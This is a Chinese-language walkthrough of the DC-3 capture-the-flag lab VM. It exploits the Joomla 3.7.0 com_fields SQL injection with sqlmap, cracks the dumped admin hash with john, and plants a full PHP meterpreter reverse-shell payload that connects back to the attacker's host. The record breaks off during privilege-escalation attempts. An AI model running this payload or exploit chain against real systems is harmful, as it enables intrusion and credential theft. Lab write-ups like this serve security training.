DC-3 靶机渗透

• DC-3靶机渗透
  • 1. 渗透过程
    • Welcome to DC-3.
    • 欢迎来到DC-3。

DC-3靶机渗透

1. 渗透过程

• 先发现主机

root@kali:~# arp-scan 192.168.0.1/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f9:47:54, IPv4: 192.168.0.21
WARNING: host part of 192.168.0.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     04:95:e6:0f:a2:10       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.22    00:0c:29:a9:c5:31       VMware, Inc.
192.168.0.109   dc:8b:28:00:fa:32       Intel Corporate

• 得到ip: 192.168.0.22

• 探测端口:

root@kali:~# nmap -sT -v -p- 192.168.0.22
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-29 15:41 CST
Initiating ARP Ping Scan at 15:41
Scanning 192.168.0.22 [1 port]
Completed ARP Ping Scan at 15:41, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 0.03s elapsed
Initiating Connect Scan at 15:41
Scanning 192.168.0.22 [65535 ports]
Discovered open port 80/tcp on 192.168.0.22
Completed Connect Scan at 15:41, 1.90s elapsed (65535 total ports)
Nmap scan report for 192.168.0.22
Host is up (0.00020s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:A9:C5:31 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

• 只有80端口

• 现进去看看

• Welcome to DC-3.

  This time, there is only one flag, one entry point and no clues.

  To get the flag, you’ll obviously have to gain root privileges.

  How you get to be root is up to you - and, obviously, the system.

  Good luck - and I hope you enjoy this little challenge. :-)

  欢迎来到DC-3。

  这次，只有一个flag，一个入口点，没有任何线索。

  要获得标志，显然必须获得root权限。

  你是如何成为根的取决于你-很明显，还有系统。

  祝你好运-我希望你喜欢这个小挑战。:-)

• 只有一个入口点？

• 页面也有一个登陆框

• 八成是突破这个登录框了

• 想看看网站的信息：

root@kali:~# whatweb http://192.168.0.22/
http://192.168.0.22/ [200 OK] Apache[2.4.18], Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], IP[192.168.0.22], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json], Title[Home]

• 发现是Joomla框架

• 先扫描一下框架版本

joomscan -u http://192.168.0.22/
[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.0.22/administrator/components
http://192.168.0.22/administrator/modules
http://192.168.0.22/administrator/templates
http://192.168.0.22/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.0.22/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.0.22/

• 发现版本：Joomla 3.7.0 和后台地址 http://192.168.0.22/administrator/

• 先看看有没有框架漏洞

root@kali:~# searchsploit Joomla 3.7.0
----------------------------------------------------------------------------------- 
   			Exploit Title  					|  Path                                                             				| (/usr/share/exploitdb/)               
----------------------------------------------------------------------------------- 
Joomla! 3.7.0 - 'com_fields' SQL Injection  | exploits/php/webapps/42033.txt       
-----------------------------------------------------------------------------------

• 有个sql注入

• 看看他注入点

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

• 直接用sqlmap 跑就完了

sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbs
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
#显然joomladb就是网站的数据库了 当然也可以跑出来
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db
15:55:43] [INFO] fetching current database
[15:55:43] [INFO] resumed: 'joomladb'
current database:    'joomladb'
# 列表名：
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables
Database: joomladb
[76 tables]
-----------------------
| #__users            |
-----------------------
# 76个表就不都写出来了
# 列字段
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T "#__users" -columns
do you want to use common column existence check? [y/N/q]
#这里选择yes 然后选择1
Database: joomladb
Table: #__users
[5 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
# 列出来了字段,把数据爆出来
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
# 用户名得到了，密码是加密的

• 这里可以用john来破解，也可以用 brupsuite 来爆破

• 我们就用 john 来破解吧

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > /tmp/pwd
# note: 用双引号要加 \$ 把 $转义掉
#接着就是 ：
john /tmp/pwd
#得到密码：snoopy

• 登录之后

• 在template里面添加了一个木马(文件名设置成了1.php)

/*<?php /**/ error_reporting(0); $ip = '192.168.0.21'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

• 然后用msf连接的

msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.22
msf5 exploit(multi/handler) > exploit
#然后浏览器访问 http://192.168.0.22/templates/beez3/1.php
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (38288 bytes) to 192.168.0.22
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.22:55430) at 2020-04-29 16:43:47 +0800

meterpreter > 
# 就连接上了
meterpreter > shell 
# 进shell

python -c 'import pty;pty.spawn("/bin/bash")' # 获得标准shell

• 然后查看用户 cd /home

• 发现只有一个dc3的用户

• 啥也没有

find / -user root -perm -4000 -print 2>/dev/null # 找suid的文件

• 也没发现可以用的

• 只能试试系统提权了

uname -a #查看内核信息
	Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
cat /etc/*release #查看版本信息
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

• 3772…无法下载….